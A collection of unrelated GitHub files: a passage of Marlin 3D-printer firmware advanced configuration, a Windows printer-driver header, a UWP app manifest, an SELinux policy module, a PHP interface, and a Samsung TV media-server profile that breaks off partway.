FILAMENT_CHANGE_UNLOAD_LENGTH 100 // (mm) The length of filament for a complete unload. // For Bowden, the full length of the tube and nozzle. // For direct drive, the full length of the nozzle. // Set to 0 for manual unloading. #define FILAMENT_CHANGE_SLOW_LOAD_FEEDRATE 6 // (mm/s) Slow move when starting load. #define FILAMENT_CHANGE_SLOW_LOAD_LENGTH 0 // (mm) Slow length, to allow time to insert material. // 0 to disable start loading and skip to fast load only #define FILAMENT_CHANGE_FAST_LOAD_FEEDRATE 6 // (mm/s) Load filament feedrate. This can be pretty fast. #define FILAMENT_CHANGE_FAST_LOAD_ACCEL 25 // (mm/s^2) Lower acceleration may allow a faster feedrate. 
#define FILAMENT_CHANGE_FAST_LOAD_LENGTH 0 // (mm) Load length of filament, from extruder gear to nozzle. // For Bowden, the full length of the tube and nozzle. // For direct drive, the full length of the nozzle. //#define ADVANCED_PAUSE_CONTINUOUS_PURGE // Purge continuously up to the purge length until interrupted. #define ADVANCED_PAUSE_PURGE_FEEDRATE 3 // (mm/s) Extrude feedrate (after loading). Should be slower than load feedrate. #define ADVANCED_PAUSE_PURGE_LENGTH 50 // (mm) Length to extrude after loading. // Set to 0 for manual extrusion. // Filament can be extruded repeatedly from the Filament Change menu // until extrusion is consistent, and to purge old filament. // Filament Unload does a Retract, Delay, and Purge first: #define FILAMENT_UNLOAD_RETRACT_LENGTH 13 // (mm) Unload initial retract length. #define FILAMENT_UNLOAD_DELAY 5000 // (ms) Delay for the filament to cool after retract. #define FILAMENT_UNLOAD_PURGE_LENGTH 8 // (mm) An unretract is done, then this length is purged. #define PAUSE_PARK_NOZZLE_TIMEOUT 45 // (seconds) Time limit before the nozzle is turned off for safety. #define FILAMENT_CHANGE_ALERT_BEEPS 10 // Number of alert beeps to play when a response is needed. #define PAUSE_PARK_NO_STEPPER_TIMEOUT // Enable for XYZ steppers to stay powered on during filament change. //#define PARK_HEAD_ON_PAUSE // Park the nozzle during pause and filament change. //#define HOME_BEFORE_FILAMENT_CHANGE // Ensure homing has been completed prior to parking for filament change //#define FILAMENT_LOAD_UNLOAD_GCODES // Add M701/M702 Load/Unload G-codes, plus Load/Unload in the LCD Prepare menu. //#define FILAMENT_UNLOAD_ALL_EXTRUDERS // Allow M702 to unload all extruders above a minimum target temp (as set by M302) #endif // @section tmc /** * TMC26X Stepper Driver options * * The TMC26XStepper library is required for this stepper driver. * https://github.com/trinamic/TMC26XStepper */ #if HAS_DRIVER(TMC26X) #define X_MAX_CURRENT 1000 // in mA #define X_SENSE_RESISTOR 91 // in mOhms #define X_MICROSTEPS 16 // number of microsteps #define X2_MAX_CURRENT 1000 #define X2_SENSE_RESISTOR 91 #define X2_MICROSTEPS 16 #define Y_MAX_CURRENT 1000 #define Y_SENSE_RESISTOR 91 #define Y_MICROSTEPS 16 #define Y2_MAX_CURRENT 1000 #define Y2_SENSE_RESISTOR 91 #define Y2_MICROSTEPS 16 #define Z_MAX_CURRENT 1000 #define Z_SENSE_RESISTOR 91 #define Z_MICROSTEPS 16 #define Z2_MAX_CURRENT 1000 #define Z2_SENSE_RESISTOR 91 #define Z2_MICROSTEPS 16 #define E0_MAX_CURRENT 1000 #define E0_SENSE_RESISTOR 91 #define E0_MICROSTEPS 16 #define E1_MAX_CURRENT 1000 #define E1_SENSE_RESISTOR 91 #define E1_MICROSTEPS 16 #define E2_MAX_CURRENT 1000 #define E2_SENSE_RESISTOR 91 #define E2_MICROSTEPS 16 #define E3_MAX_CURRENT 1000 #define E3_SENSE_RESISTOR 91 #define E3_MICROSTEPS 16 #define E4_MAX_CURRENT 1000 #define E4_SENSE_RESISTOR 91 #define E4_MICROSTEPS 16 #endif // @section tmc_smart /** * To use TMC2130 stepper drivers in SPI mode connect your SPI pins to * the hardware SPI interface on your board and define the required CS pins * in your `pins_MYBOARD.h` file. (e.g., RAMPS 1.4 uses AUX3 pins `X_CS_PIN 53`, `Y_CS_PIN 49`, etc.). * You may also use software SPI if you wish to use general purpose IO pins. * * You'll also need the TMC2130Stepper Arduino library * (https://github.com/teemuatlut/TMC2130Stepper). * * To use TMC2208 stepper UART-configurable stepper drivers * connect #_SERIAL_TX_PIN to the driver side PDN_UART pin with a 1K resistor. 
* To use the reading capabilities, also connect #_SERIAL_RX_PIN * to PDN_UART without a resistor. * The drivers can also be used with hardware serial. * * You'll also need the TMC2208Stepper Arduino library * (https://github.com/teemuatlut/TMC2208Stepper). */ #if HAS_TRINAMIC #define R_SENSE 0.11 // R_sense resistor for SilentStepStick2130 #define HOLD_MULTIPLIER 0.5 // Scales down the holding current from run current #define INTERPOLATE true // Interpolate X/Y/Z_MICROSTEPS to 256 #define X_CURRENT 800 // rms current in mA. Multiply by 1.41 for peak current. #define X_MICROSTEPS 16 // 0..256 #define Y_CURRENT 800 #define Y_MICROSTEPS 16 #define Z_CURRENT 800 #define Z_MICROSTEPS 16 #define X2_CURRENT 800 #define X2_MICROSTEPS 16 #define Y2_CURRENT 800 #define Y2_MICROSTEPS 16 #define Z2_CURRENT 800 #define Z2_MICROSTEPS 16 #define E0_CURRENT 800 #define E0_MICROSTEPS 16 #define E1_CURRENT 800 #define E1_MICROSTEPS 16 #define E2_CURRENT 800 #define E2_MICROSTEPS 16 #define E3_CURRENT 800 #define E3_MICROSTEPS 16 #define E4_CURRENT 800 #define E4_MICROSTEPS 16 /** * Use software SPI for TMC2130. * The default SW SPI pins are defined the respective pins files, * but you can override or define them here. */ //#define TMC_USE_SW_SPI //#define TMC_SW_MOSI -1 //#define TMC_SW_MISO -1 //#define TMC_SW_SCK -1 /** * Use Trinamic's ultra quiet stepping mode. * When disabled, Marlin will use spreadCycle stepping mode. */ #define STEALTHCHOP /** * Monitor Trinamic TMC2130 and TMC2208 drivers for error conditions, * like overtemperature and short to ground. TMC2208 requires hardware serial. * In the case of overtemperature Marlin can decrease the driver current until error condition clears. * Other detected conditions can be used to stop the current print. * Relevant g-codes: * M906 - Set or get motor current in milliamps using axis codes X, Y, Z, E. Report values if no axis codes given. * M911 - Report stepper driver overtemperature pre-warn condition. * M912 - Clear stepper driver overtemperature pre-warn condition flag. * M122 S0/1 - Report driver parameters (Requires TMC_DEBUG) */ //#define MONITOR_DRIVER_STATUS #if ENABLED(MONITOR_DRIVER_STATUS) #define CURRENT_STEP_DOWN 50 // [mA] #define REPORT_CURRENT_CHANGE #define STOP_ON_ERROR #endif /** * The driver will switch to spreadCycle when stepper speed is over HYBRID_THRESHOLD. * This mode allows for faster movements at the expense of higher noise levels. * STEALTHCHOP needs to be enabled. * M913 X/Y/Z/E to live tune the setting */ //#define HYBRID_THRESHOLD #define X_HYBRID_THRESHOLD 100 // [mm/s] #define X2_HYBRID_THRESHOLD 100 #define Y_HYBRID_THRESHOLD 100 #define Y2_HYBRID_THRESHOLD 100 #define Z_HYBRID_THRESHOLD 3 #define Z2_HYBRID_THRESHOLD 3 #define E0_HYBRID_THRESHOLD 30 #define E1_HYBRID_THRESHOLD 30 #define E2_HYBRID_THRESHOLD 30 #define E3_HYBRID_THRESHOLD 30 #define E4_HYBRID_THRESHOLD 30 /** * Use stallGuard2 to sense an obstacle and trigger an endstop. * You need to place a wire from the driver's DIAG1 pin to the X/Y endstop pin. * X, Y, and Z homing will always be done in spreadCycle mode. * * X/Y/Z_HOMING_SENSITIVITY is used for tuning the trigger sensitivity. * Higher values make the system LESS sensitive. * Lower value make the system MORE sensitive. * Too low values can lead to false positives, while too high values will collide the axis without triggering. * It is advised to set X/Y/Z_HOME_BUMP_MM to 0. 
* M914 X/Y/Z to live tune the setting */ //#define SENSORLESS_HOMING // TMC2130 only #if ENABLED(SENSORLESS_HOMING) #define X_HOMING_SENSITIVITY 8 #define Y_HOMING_SENSITIVITY 8 #define Z_HOMING_SENSITIVITY 8 #endif /** * Enable M122 debugging command for TMC stepper drivers. * M122 S0/1 will enable continous reporting. */ //#define TMC_DEBUG /** * M915 Z Axis Calibration * * - Adjust Z stepper current, * - Drive the Z axis to its physical maximum, and * - Home Z to account for the lost steps. * * Use M915 Snn to specify the current. * Use M925 Znn to add extra Z height to Z_MAX_POS. */ //#define TMC_Z_CALIBRATION #if ENABLED(TMC_Z_CALIBRATION) #define CALIBRATION_CURRENT 250 #define CALIBRATION_EXTRA_HEIGHT 10 #endif /** * You can set your own advanced settings by filling in predefined functions. * A list of available functions can be found on the library github page * https://github.com/teemuatlut/TMC2130Stepper * https://github.com/teemuatlut/TMC2208Stepper * * Example: * #define TMC_ADV() { \ * stepperX.diag0_temp_prewarn(1); \ * stepperY.interpolate(0); \ * } */ #define TMC_ADV() { } #endif // TMC2130 || TMC2208 // @section L6470 /** * L6470 Stepper Driver options * * The Arduino-L6470 library is required for this stepper driver. * https://github.com/ameyer/Arduino-L6470 */ #if HAS_DRIVER(L6470) #define X_MICROSTEPS 16 // number of microsteps #define X_OVERCURRENT 2000 // maxc current in mA. If the current goes over this value, the driver will switch off #define X_STALLCURRENT 1500 // current in mA where the driver will detect a stall #define X2_MICROSTEPS 16 #define X2_OVERCURRENT 2000 #define X2_STALLCURRENT 1500 #define Y_MICROSTEPS 16 #define Y_OVERCURRENT 2000 #define Y_STALLCURRENT 1500 #define Y2_MICROSTEPS 16 #define Y2_OVERCURRENT 2000 #define Y2_STALLCURRENT 1500 #define Z_MICROSTEPS 16 #define Z_OVERCURRENT 2000 #define Z_STALLCURRENT 1500 #define Z2_MICROSTEPS 16 #define Z2_OVERCURRENT 2000 #define Z2_STALLCURRENT 1500 #define E0_MICROSTEPS 16 #define E0_OVERCURRENT 2000 #define E0_STALLCURRENT 1500 #define E1_MICROSTEPS 16 #define E1_OVERCURRENT 2000 #define E1_STALLCURRENT 1500 #define E2_MICROSTEPS 16 #define E2_OVERCURRENT 2000 #define E2_STALLCURRENT 1500 #define E3_MICROSTEPS 16 #define E3_OVERCURRENT 2000 #define E3_STALLCURRENT 1500 #define E4_MICROSTEPS 16 #define E4_OVERCURRENT 2000 #define E4_STALLCURRENT 1500 #endif /** * TWI/I2C BUS * * This feature is an EXPERIMENTAL feature so it shall not be used on production * machines. Enabling this will allow you to send and receive I2C data from slave * devices on the bus. * * ; Example #1 * ; This macro send the string "Marlin" to the slave device with address 0x63 (99) * ; It uses multiple M260 commands with one B<base 10> arg * M260 A99 ; Target slave address * M260 B77 ; M * M260 B97 ; a * M260 B114 ; r * M260 B108 ; l * M260 B105 ; i * M260 B110 ; n * M260 S1 ; Send the current buffer * * ; Example #2 * ; Request 6 bytes from slave device with address 0x63 (99) * M261 A99 B5 * * ; Example #3 * ; Example serial output of a M261 request * echo:i2c-reply: from:99 bytes:5 data:hello */ // @section i2cbus //#define EXPERIMENTAL_I2CBUS #define I2C_SLAVE_ADDRESS 0 // Set a value from 8 to 127 to act as a slave // @section extras /** * Spindle & Laser control * * Add the M3, M4, and M5 commands to turn the spindle/laser on and off, and * to set spindle speed, spindle direction, and laser power. * * SuperPid is a router/spindle speed controller used in the CNC milling community. 
* Marlin can be used to turn the spindle on and off. It can also be used to set * the spindle speed from 5,000 to 30,000 RPM. * * You'll need to select a pin for the ON/OFF function and optionally choose a 0-5V * hardware PWM pin for the speed control and a pin for the rotation direction. * * See http://marlinfw.org/docs/configuration/laser_spindle.html for more config details. */ //#define SPINDLE_LASER_ENABLE #if ENABLED(SPINDLE_LASER_ENABLE) #define SPINDLE_LASER_ENABLE_INVERT false // set to "true" if the on/off function is reversed #define SPINDLE_LASER_PWM true // set to true if your controller supports setting the speed/power #define SPINDLE_LASER_PWM_INVERT true // set to "true" if the speed/power goes up when you want it to go slower #define SPINDLE_LASER_POWERUP_DELAY 5000 // delay in milliseconds to allow the spindle/laser to come up to speed/power #define SPINDLE_LASER_POWERDOWN_DELAY 5000 // delay in milliseconds to allow the spindle to stop #define SPINDLE_DIR_CHANGE true // set to true if your spindle controller supports changing spindle direction #define SPINDLE_INVERT_DIR false #define SPINDLE_STOP_ON_DIR_CHANGE true // set to true if Marlin should stop the spindle before changing rotation direction /** * The M3 & M4 commands use the following equation to convert PWM duty cycle to speed/power * * SPEED/POWER = PWM duty cycle * SPEED_POWER_SLOPE + SPEED_POWER_INTERCEPT * where PWM duty cycle varies from 0 to 255 * * set the following for your controller (ALL MUST BE SET) */ #define SPEED_POWER_SLOPE 118.4 #define SPEED_POWER_INTERCEPT 0 #define SPEED_POWER_MIN 5000 #define SPEED_POWER_MAX 30000 // SuperPID router controller 0 - 30,000 RPM //#define SPEED_POWER_SLOPE 0.3922 //#define SPEED_POWER_INTERCEPT 0 //#define SPEED_POWER_MIN 10 //#define SPEED_POWER_MAX 100 // 0-100% #endif /** * Filament Width Sensor * * Measures the filament width in real-time and adjusts * flow rate to compensate for any irregularities. * * Also allows the measured filament diameter to set the * extrusion rate, so the slicer only has to specify the * volume. * * Only a single extruder is supported at this time. * * 34 RAMPS_14 : Analog input 5 on the AUX2 connector * 81 PRINTRBOARD : Analog input 2 on the Exp1 connector (version B,C,D,E) * 301 RAMBO : Analog input 3 * * Note: May require analog pins to be defined for other boards. */ //#define FILAMENT_WIDTH_SENSOR #if ENABLED(FILAMENT_WIDTH_SENSOR) #define FILAMENT_SENSOR_EXTRUDER_NUM 0 // Index of the extruder that has the filament sensor. :[0,1,2,3,4] #define MEASUREMENT_DELAY_CM 14 // (cm) The distance from the filament sensor to the melting chamber #define FILWIDTH_ERROR_MARGIN 1.0 // (mm) If a measurement differs too much from nominal width ignore it #define MAX_MEASUREMENT_DELAY 20 // (bytes) Buffer size for stored measurements (1 byte per cm). Must be larger than MEASUREMENT_DELAY_CM. #define DEFAULT_MEASURED_FILAMENT_DIA DEFAULT_NOMINAL_FILAMENT_DIA // Set measured to nominal initially // Display filament width on the LCD status line. Status messages will expire after 5 seconds. //#define FILAMENT_LCD_DISPLAY #endif /** * CNC Coordinate Systems * * Enables G53 and G54-G59.3 commands to select coordinate systems * and G92.1 to reset the workspace to native machine space. 
*/ //#define CNC_COORDINATE_SYSTEMS /** * M43 - display pin status, watch pins for changes, watch endstops & toggle LED, Z servo probe test, toggle pins */ //#define PINS_DEBUGGING /** * Auto-report temperatures with M155 S<seconds> */ #define AUTO_REPORT_TEMPERATURES /** * Include capabilities in M115 output */ #define EXTENDED_CAPABILITIES_REPORT /** * Disable all Volumetric extrusion options */ //#define NO_VOLUMETRICS #if DISABLED(NO_VOLUMETRICS) /** * Volumetric extrusion default state * Activate to make volumetric extrusion the default method, * with DEFAULT_NOMINAL_FILAMENT_DIA as the default diameter. * * M200 D0 to disable, M200 Dn to set a new diameter. */ //#define VOLUMETRIC_DEFAULT_ON #endif /** * Enable this option for a leaner build of Marlin that removes all * workspace offsets, simplifying coordinate transformations, leveling, etc. * * - M206 and M428 are disabled. * - G92 will revert to its behavior from Marlin 1.0. */ //#define NO_WORKSPACE_OFFSETS /** * Set the number of proportional font spaces required to fill up a typical character space. * This can help to better align the output of commands like `G29 O` Mesh Output. * * For clients that use a fixed-width font (like OctoPrint), leave this set to 1.0. * Otherwise, adjust according to your client and font. */ #define PROPORTIONAL_FONT_RATIO 1.0 /** * Spend 28 bytes of SRAM to optimize the GCode parser */ #define FASTER_GCODE_PARSER /** * User-defined menu items that execute custom GCode */ //#define CUSTOM_USER_MENUS #if ENABLED(CUSTOM_USER_MENUS) #define USER_SCRIPT_DONE "M117 User Script Done" #define USER_SCRIPT_AUDIBLE_FEEDBACK //#define USER_SCRIPT_RETURN // Return to status screen after a script #define USER_DESC_1 "Home & UBL Info" #define USER_GCODE_1 "G28\nG29 W" #define USER_DESC_2 "Preheat for PLA" #define USER_GCODE_2 "M140 S" STRINGIFY(PREHEAT_1_TEMP_BED) "\nM104 S" STRINGIFY(PREHEAT_1_TEMP_HOTEND) #define USER_DESC_3 "Preheat for ABS" #define USER_GCODE_3 "M140 S" STRINGIFY(PREHEAT_2_TEMP_BED) "\nM104 S" STRINGIFY(PREHEAT_2_TEMP_HOTEND) #define USER_DESC_4 "Heat Bed/Home/Level" #define USER_GCODE_4 "M140 S" STRINGIFY(PREHEAT_2_TEMP_BED) "\nG28\nG29" #define USER_DESC_5 "Home & Info" #define USER_GCODE_5 "G28\nM503" #endif /** * Specify an action command to send to the host when the printer is killed. * Will be sent in the form '//action:ACTION_ON_KILL', e.g. '//action:poweroff'. * The host must be configured to handle the action command. */ //#define ACTION_ON_KILL "poweroff" /** * Specify an action command to send to the host on pause and resume. * Will be sent in the form '//action:ACTION_ON_PAUSE', e.g. '//action:pause'. * The host must be configured to handle the action command. */ //#define ACTION_ON_PAUSE "pause" //#define ACTION_ON_RESUME "resume" //=========================================================================== //====================== I2C Position Encoder Settings ====================== //=========================================================================== /** * I2C position encoders for closed loop control. * Developed by Chris Barr at Aus3D. * * Wiki: http://wiki.aus3d.com.au/Magnetic_Encoder * Github: https://github.com/Aus3D/MagneticEncoder * * Supplier: http://aus3d.com.au/magnetic-encoder-module * Alternative Supplier: http://reliabuild3d.com/ * * Reilabuild encoders have been modified to improve reliability. 
*/ //#define I2C_POSITION_ENCODERS #if ENABLED(I2C_POSITION_ENCODERS) #define I2CPE_ENCODER_CNT 1 // The number of encoders installed; max of 5 // encoders supported currently. #define I2CPE_ENC_1_ADDR I2CPE_PRESET_ADDR_X // I2C address of the encoder. 30-200. #define I2CPE_ENC_1_AXIS X_AXIS // Axis the encoder module is installed on. <X|Y|Z|E>_AXIS. #define I2CPE_ENC_1_TYPE I2CPE_ENC_TYPE_LINEAR // Type of encoder: I2CPE_ENC_TYPE_LINEAR -or- // I2CPE_ENC_TYPE_ROTARY. #define I2CPE_ENC_1_TICKS_UNIT 2048 // 1024 for magnetic strips with 2mm poles; 2048 for // 1mm poles. For linear encoders this is ticks / mm, // for rotary encoders this is ticks / revolution. //#define I2CPE_ENC_1_TICKS_REV (16 * 200) // Only needed for rotary encoders; number of stepper // steps per full revolution (motor steps/rev * microstepping) //#define I2CPE_ENC_1_INVERT // Invert the direction of axis travel. #define I2CPE_ENC_1_EC_METHOD I2CPE_ECM_MICROSTEP // Type of error error correction. #define I2CPE_ENC_1_EC_THRESH 0.10 // Threshold size for error (in mm) above which the // printer will attempt to correct the error; errors // smaller than this are ignored to minimize effects of // measurement noise / latency (filter). #define I2CPE_ENC_2_ADDR I2CPE_PRESET_ADDR_Y // Same as above, but for encoder 2. #define I2CPE_ENC_2_AXIS Y_AXIS #define I2CPE_ENC_2_TYPE I2CPE_ENC_TYPE_LINEAR #define I2CPE_ENC_2_TICKS_UNIT 2048 //#define I2CPE_ENC_2_TICKS_REV (16 * 200) //#define I2CPE_ENC_2_INVERT #define I2CPE_ENC_2_EC_METHOD I2CPE_ECM_MICROSTEP #define I2CPE_ENC_2_EC_THRESH 0.10 #define I2CPE_ENC_3_ADDR I2CPE_PRESET_ADDR_Z // Encoder 3. Add additional configuration options #define I2CPE_ENC_3_AXIS Z_AXIS // as above, or use defaults below. #define I2CPE_ENC_4_ADDR I2CPE_PRESET_ADDR_E // Encoder 4. #define I2CPE_ENC_4_AXIS E_AXIS #define I2CPE_ENC_5_ADDR 34 // Encoder 5. #define I2CPE_ENC_5_AXIS E_AXIS // Default settings for encoders which are enabled, but without settings configured above. #define I2CPE_DEF_TYPE I2CPE_ENC_TYPE_LINEAR #define I2CPE_DEF_ENC_TICKS_UNIT 2048 #define I2CPE_DEF_TICKS_REV (16 * 200) #define I2CPE_DEF_EC_METHOD I2CPE_ECM_NONE #define I2CPE_DEF_EC_THRESH 0.1 //#define I2CPE_ERR_THRESH_ABORT 100.0 // Threshold size for error (in mm) error on any given // axis after which the printer will abort. Comment out to // disable abort behaviour. #define I2CPE_TIME_TRUSTED 10000 // After an encoder fault, there must be no further fault // for this amount of time (in ms) before the encoder // is trusted again. /** * Position is checked every time a new command is executed from the buffer but during long moves, * this setting determines the minimum update time between checks. A value of 100 works well with * error rolling average when attempting to correct only for skips and not for vibration. */ #define I2CPE_MIN_UPD_TIME_MS 4 // (ms) Minimum time between encoder checks. // Use a rolling average to identify persistant errors that indicate skips, as opposed to vibration and noise. #define I2CPE_ERR_ROLLING_AVERAGE #endif // I2C_POSITION_ENCODERS /** * MAX7219 Debug Matrix * * Add support for a low-cost 8x8 LED Matrix based on the Max7219 chip as a realtime status display. * Requires 3 signal wires. Some useful debug options are included to demonstrate its usage. 
 */
//#define MAX7219_DEBUG
#if ENABLED(MAX7219_DEBUG)
  #define MAX7219_CLK_PIN   64
  #define MAX7219_DIN_PIN   57
  #define MAX7219_LOAD_PIN  44

  //#define MAX7219_GCODE          // Add the M7219 G-code to control the LED matrix
  #define MAX7219_INIT_TEST    2   // Do a test pattern at initialization (Set to 2 for spiral)
  #define MAX7219_NUMBER_UNITS 1   // Number of Max7219 units in chain.
  #define MAX7219_ROTATE       0   // Rotate the display clockwise (in multiples of +/- 90°)
                                   // connector at:  right=0   bottom=-90  top=90  left=180
  /**
   * Sample debug features
   * If you add more debug displays, be careful to avoid conflicts!
   */
  #define MAX7219_DEBUG_PRINTER_ALIVE    // Blink corner LED of 8x8 matrix to show that the firmware is functioning
  #define MAX7219_DEBUG_PLANNER_HEAD  3  // Show the planner queue head position on this and the next LED matrix row
  #define MAX7219_DEBUG_PLANNER_TAIL  5  // Show the planner queue tail position on this and the next LED matrix row

  #define MAX7219_DEBUG_PLANNER_QUEUE 0  // Show the current planner queue depth on this and the next LED matrix row
                                         // If you experience stuttering, reboots, etc. this option can reveal how
                                         // tweaks made to the configuration are affecting the printer in real-time.
#endif

/**
 * NanoDLP Sync support
 *
 * Add support for synchronized Z moves when used with NanoDLP. G0/G1 axis moves will output the "Z_move_comp"
 * string to enable synchronization with DLP projector exposure. This change allows you to use
 * [[WaitForDoneMessage]] instead of populating your G-code with M400 commands.
 */
//#define NANODLP_Z_SYNC
#if ENABLED(NANODLP_Z_SYNC)
  //#define NANODLP_ALL_AXIS  // Enables "Z_move_comp" output on any axis move.
                              // Default behaviour is limited to Z axis only.
#endif

// Enable Marlin dev mode which adds some special commands
//#define MARLIN_DEV_MODE

#endif // CONFIGURATION_ADV_H
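/**
 * Worked example for the SPEED_POWER_* spindle settings documented above
 * (illustrative only; the function sketched below is NOT part of Marlin and
 * its name is hypothetical). With SPEED_POWER_SLOPE 118.4 and
 * SPEED_POWER_INTERCEPT 0, the M3/M4 relation
 *   SPEED = PWM duty * SPEED_POWER_SLOPE + SPEED_POWER_INTERCEPT
 * works out to:
 *
 *   M3 S15000  ->  PWM duty ≈ (15000 - 0) / 118.4 ≈ 127 (of 255)
 *   PWM 255    ->  255 * 118.4 + 0 ≈ 30192 RPM, just above SPEED_POWER_MAX
 *
 * A minimal sketch of the inverse mapping, clamped to the configured limits:
 *
 *   static inline uint8_t spindle_speed_to_pwm(float rpm) {
 *     if (rpm < SPEED_POWER_MIN) rpm = SPEED_POWER_MIN;
 *     if (rpm > SPEED_POWER_MAX) rpm = SPEED_POWER_MAX;
 *     const float duty = (rpm - SPEED_POWER_INTERCEPT) / SPEED_POWER_SLOPE;
 *     return (uint8_t)(duty + 0.5f);   // 0-255 duty cycle
 *   }
 */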
{ "pile_set_name": "Github" }
/******************************* MODULE HEADER ****************************** * jdhandler.h * Job Directive Handler Module. Handles different job directives * given to us by OEMCommandCallback. * Revision History: * Created: 9/19/96 -- Joel Rieke * ****************************************************************************/ #ifndef _jdhandler_h #define _jdhandler_h BOOL bJDValidatePJLSettings(POEMPDEV pdev); VOID JDEndJob(POEMPDEV pdev); BOOL bJDStartJob(POEMPDEV pdev, PHP5PDEV pHP5pdev); BOOL bJDCopyCheck(POEMPDEV pdev, DWORD copyCntCheck); #endif
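/* Usage sketch (an assumption for illustration only, not taken from the
 * original driver sources): a plugin built around this header would
 * presumably validate the PJL job settings, start the job before rendering,
 * and end it when the job completes. The wrapper names below are hypothetical
 * and the block is guarded out with #if 0 so it has no effect.
 */
#if 0
BOOL bBeginRenderJob(POEMPDEV pdev, PHP5PDEV pHP5pdev)
{
    if (!bJDValidatePJLSettings(pdev))      // presumably rejects unsupported PJL settings
        return FALSE;
    return bJDStartJob(pdev, pHP5pdev);     // presumably emits job-start directives
}

VOID vFinishRenderJob(POEMPDEV pdev)
{
    JDEndJob(pdev);                         // presumably emits job-end directives
}
#endif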
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="utf-8"?> <Package xmlns="http://schemas.microsoft.com/appx/manifest/foundation/windows10" xmlns:mp="http://schemas.microsoft.com/appx/2014/phone/manifest" xmlns:uap="http://schemas.microsoft.com/appx/manifest/uap/windows10" IgnorableNamespaces="uap mp"> <Identity Name="Microsoft.SDKSamples.ScreenCasting.CS" Publisher="CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US" Version="1.0.0.0" /> <mp:PhoneIdentity PhoneProductId="637456CC-56A1-4C4D-97D5-87AC05C3DFCD" PhonePublisherId="00000000-0000-0000-0000-000000000000" /> <Properties> <DisplayName>ScreenCasting C# Sample</DisplayName> <PublisherDisplayName>Microsoft Corporation</PublisherDisplayName> <Logo>Assets\StoreLogo-sdk.png</Logo> </Properties> <Dependencies> <TargetDeviceFamily Name="Windows.Universal" MinVersion="10.0.10240.0" MaxVersionTested="10.0.18362.0" /> </Dependencies> <Resources> <Resource Language="x-generate" /> </Resources> <Applications> <Application Id="App" Executable="$targetnametoken$.exe" EntryPoint="ScreenCasting.App"> <uap:VisualElements DisplayName="ScreenCasting C# Sample" Square150x150Logo="Assets\SquareTile-sdk.png" Square44x44Logo="Assets\smallTile-sdk.png" Description="ScreenCasting C# Sample" BackgroundColor="#00b2f0"> <uap:SplashScreen Image="Assets\splash-sdk.png" BackgroundColor="#00b2f0" /> <uap:DefaultTile> <uap:ShowNameOnTiles> <uap:ShowOn Tile="square150x150Logo" /> </uap:ShowNameOnTiles> </uap:DefaultTile> </uap:VisualElements> <Extensions> <uap:Extension Category="windows.dialProtocol"> <uap:DialProtocol Name="screencasting" /> </uap:Extension> </Extensions> </Application> </Applications> <Capabilities> <Capability Name="internetClient" /> <Capability Name="privateNetworkClientServer" /> </Capabilities> </Package>
{ "pile_set_name": "Github" }
module bblfshd 1.0; require { type container_runtime_t; type spc_t; class fifo_file setattr; } #============= spc_t ============== allow spc_t container_runtime_t:fifo_file setattr;
{ "pile_set_name": "Github" }
<?php declare(strict_types = 1); namespace TheSeer\phpDox; interface FactoryInterface { public function getInstanceFor($name); }
{ "pile_set_name": "Github" }
#---------------------------------------------------------------------------- # Profile for Samsung 9 Series TVs. # See DefaultRenderer.conf for descriptions of all the available options. # # Support MPO images as well (image/mpo) # issue: http://www.universalmediaserver.com/forum/posting.php?mode=reply&f=9&t=9249 RendererName = Samsung 9 Series RendererIcon = Samsung-HU9000.png # ============================================================================ # This renderer has sent the following string/s: # # User-Agent: DLNADOC/1.50 SEC_HHP_[TV] Samsung 9 Series (65)/1.0 UPnP/1.0 # friendlyName=[TV] Samsung 9 Series (65) # uuid:aa54de66-0ecd-4936-bd2f-c7b4c381f4f5 # manufacturer=Samsung Electronics # modelName=UE65KS9590 # modelNumber=AllShare1.0 # modelDescription=Samsung TV DMR # manufacturerURL=http://www.samsung.com/sec # modelURL=http://www.samsung.com/sec # ============================================================================ # http://www.samsung.com/us/support/answer/ANS00049952/ # http://www.samsung.com/us/support/answer/ANS00045927/ # http://www.samsung.com/us/support/answer/ANS00049184/ UserAgentSearch = Samsung 9 Series UpnpDetailsSearch = Samsung 9 Series LoadingPriority = 1 TranscodeVideo = MPEGTS-H264-AC3 TranscodeAudio = WAV MaxVideoWidth = 4096 MaxVideoHeight = 2160 SupportedVideoBitDepths = 8,10 H264Level41Limited = false H265Level51Limited = true SeekByTime = exclusive SubtitleHttpHeader = CaptionInfo.sec PrependTrackNumbers = true CharMap = / : MediaInfo = true # Supported video formats: Supported = f:3gp|3g2 v:h264 a:aac-lc|he-aac m:video/3gpp b:60000000 w:3840 h:2160 Supported = f:3gp|3g2 v:h264 a:aac-lc|he-aac m:video/3gpp b:60000000 w:4096 h:2160 Supported = f:3gp|3g2 v:mp4 a:aac-lc|he-aac m:video/3gpp b:20000000 w:1920 h:1080 Supported = f:avi v:h264 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:60000000 w:3840 h:2160 gmc:0|1 Supported = f:avi v:h264 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:60000000 w:4096 h:2160 gmc:0|1 Supported = f:avi v:mp4|mpeg1|mpeg2|vc1 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:20000000 w:1920 h:1080 gmc:0|1 Supported = f:avi v:h263|vp6|wmv a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:20000000 w:1920 h:1080 gmc:0|1 Supported = f:avi v:mjpeg a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/avi b:80000000 w:4096 h:2160 gmc:0|1 Supported = f:divx v:h264 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:60000000 w:4096 h:2160 Supported = f:divx v:h264 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:60000000 w:3840 h:2160 Supported = f:divx v:mjpeg a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:80000000 w:4096 h:2160 Supported = f:divx v:divx|mp4|mpeg1|mpeg2|vc1 a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:20000000 w:1920 h:1080 Supported = f:divx v:h263|vp6|wmv a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/x-divx b:20000000 w:1920 h:1080 Supported = f:flv v:h264 a:aac-lc|he-aac|mp3 m:video/x-flv b:60000000 w:4096 h:2160 Supported = f:flv v:h264 